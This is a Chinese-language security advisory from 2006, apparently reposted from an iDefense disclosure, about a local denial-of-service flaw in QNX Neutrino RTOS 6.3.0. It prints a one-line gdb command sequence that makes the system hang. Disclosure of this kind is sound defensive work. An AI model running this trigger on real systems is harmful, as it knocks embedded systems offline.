返回首页

QNX RTOS 本地拒绝服务漏洞

时间:2006-02-25 来源: 作者: 点击:
漏洞信息 QNX Neutrino RTOS (QNX)是一款设计用于嵌入系统的实时操作系统。 QNX Neutrino RTOS (QNX)不正确处理恶意命令,本地攻击者可以利用漏洞对系统进行拒绝服务攻击。 本地攻击者执行如下命令: echo -e "break *0xb032d59f\nr\ncont\ncont" gdb gdb 可导致操作系
    漏洞信息

  QNX Neutrino RTOS (QNX)是一款设计用于嵌入系统的实时操作系统。

  QNX Neutrino RTOS (QNX)不正确处理恶意命令,本地攻击者可以利用漏洞对系统进行拒绝服务攻击。

  本地攻击者执行如下命令:

  echo -e "break *0xb032d59f\nr\ncont\ncont"   gdb gdb

  可导致操作系统不响应并挂起。

  CNCAN ID:CNCAN-2006020810

  漏洞消息时间:2006-02-07

  漏洞起因

  边界条件错误

  影响系统

  QNX Neutrino RTOS 6.3.0

  危害

  本地攻击者可以利用漏洞对系统进行拒绝服务攻击。

  攻击所需条件

  攻击者必须访问QNX Neutrino RTOS (QNX)。

  厂商解决方案

  目前没有解决方案提供,请关注以下链接:

  http://www.qnx.com/products/rtos/

  漏洞提供者

  iDefense Security Advisory

  漏洞消息链接

  http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0121.html

  漏洞消息标题

  iDefense Security Advisory 02.07.06: QNX RTOS 6.3.0 Local Denial of Service Vulnerability
------分隔线----------------------------
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
最新评论 查看所有评论
发表评论 查看所有评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 密码: 验证码:
推荐内容